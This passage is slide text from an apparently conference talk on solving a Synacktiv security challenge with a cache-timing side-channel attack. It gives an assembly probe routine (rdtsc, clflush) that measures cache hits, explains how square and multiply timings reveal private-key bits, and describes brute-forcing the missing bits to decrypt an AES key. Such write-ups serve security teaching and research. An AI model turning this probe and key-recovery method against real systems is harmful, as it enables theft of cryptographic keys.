  • 40. Attack! (3) ● Empirically determine two values: – Sleep time between measures – Threshold to determine if data is in cache ● Final exploit: – Ask decryption of key – Do N measures (one measure stored on 1 bit) – Retrieve measures
  • 41. Measurement example probe: mfence lfence rdtsc mov esi, eax mov eax, DWORD [rdi] lfence rdtsc sub eax, esi mov esi, eax xor rax, rax clflush [rdi] cmp esi, 0xc0 jge probend mov rax, 1 probend: retn
  • 42. Retrieve the key from the bits ● Some statistical analysis and black magic – Assume square() and multiply() take the same amount of time – X 1's followed by X 0's → bit 1 – X 0's only not preceded by 1's → bit 0 ● We can see the bits in an hexdump!
  • 43. GET THE KEY §§§ 1 11 00 000
  • 44. Avoid measurement errors ● Repeat the operation 100 times ● Take the best candidate – One key is found 70 times on 100 – Other ones only differ by a few bits… exploit in not perfect :) ● Final key found is 1374 bits – And does not work to decrypt the AES key :(
  • 45. Lack of bits ● We may have failed getting some bits ? – N modulus is 1380 bits ● Bruteforce at most 6 bits of the key ! – Good key found in seconds
  • 46. Final run ● Decrypt AES key contained in “messages” file using the retrieved key ● Decrypt the message using AES key $ python final_p3.py Good job! Send the secret 3fcba5e1dbb21b86c31c8ae490819ab6 to 82d6e1a04a8ca30082e81ad27dec7cb4@synacktiv.com. Also, don't forget to send us your solution within 10 days. Synacktiv team
  • 47. Thanks ! ● For your attention ● To NSC staff for this presentation ● To Synacktiv for their crazy challenge